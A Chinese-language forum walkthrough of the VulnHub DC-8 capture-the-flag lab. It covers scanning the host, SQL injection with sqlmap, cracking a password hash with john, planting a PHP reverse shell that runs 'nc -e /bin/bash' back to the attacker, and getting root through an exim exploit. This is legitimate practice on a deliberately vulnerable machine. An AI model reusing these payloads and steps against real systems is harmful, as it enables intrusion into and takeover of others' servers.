电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 717 人浏览分享

vulnhub DC-8靶机实战

[复制链接]
717 0
0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-8,367/

QQ截图20221209142032.png

安装好并将网络置为NET模式
kali net模式
DC-8 net模式

QQ截图20221209142115.png

0X02 信息收集

1.主机发现

arpscan -l

QQ截图20221209142202.png

kali  192.168.190.128

DC-7  192.168.190.136

2.端口收集

nmap -sS 192.168.190.136

2239.png

发现存在80端口,可以进行查看,直接查看跳转到了

http://192.168.190.136/

QQ截图20221209142321.png

3.目录扫描

python3 dirsearch.py -u http://192.168.190.136/

2238.png

成功找到后台登陆页面

http://wordy/wp-login.php

2236.png

4.查看网站配置

QQ截图20221209142856.png

可以看到是一个cms

0X03 Getshell

1.漏洞发现

http://192.168.190.136/?nid=1

2233.png

可以尝试进行sql注入测试

sqlmap -u http://192.168.190.136/?nid=1 --dbs

可以看到是存在sql注入的

2232.png

最终查到账户名和密码,但却是加密,需要解密

2231.png

先用md5网站试一下,未解密成功

2230.png

将密码放置到文本文件中,用john进行解密

2229.png

解密到john的密码

2228.png

john/turtle

2226.png

成功登录,查看功能点

2.漏洞利用

Add content——Webfrom——Find contert——WebForm——Form setting

189.png

写入php反弹shell

<?php system("nc -e /bin/bash 192.168.190.128 6789"); ?>

188.png

kali先开启监听

nc -lvvp 6789

186.png

发送邮件

185.png

3.反弹shell

184.png

进行交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

182.png

0X04 提权

1.当前权限

whoami    # www-data

181.png

2.开始提权

尝试suid提权

find / -perm -u=s -type f 2>/dev/null

180.png

查看exim版本

exim4 --version

169.png

https://www.exploit-db.com/exploits/46996找到一个可以使用的exp
下载kali开启http服务,
在靶机下载exp,赋予权限

168.png

chmod 777 46996.sh ----给予权限

bash ./46996.sh -m netcat-----提权

166.png

失败,字符有问题,百度一下,源文件是doc格式,linux只识别unix,要在kali中修改文件格式再上传
​cd /usr/share/exploitdb/exploits/linux/local/
vi 46996.sh
:set ff? # 查询文件格式
:set ff=unix # 将文件格式改成Unix格式

118.png

提权成功

cd /root
ls
cat flag.txt

116.png

0X05 总结

1.首先收集信息,真实ip,端口,网站目录,网站部署部件等
2.根据SQL注入拿到某一用户的账号密码
3.登录成功后,利用命令进行反弹shell
4.再利用suid提权
6.拿到root shell
7.root用户家目录下进行查找flag

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.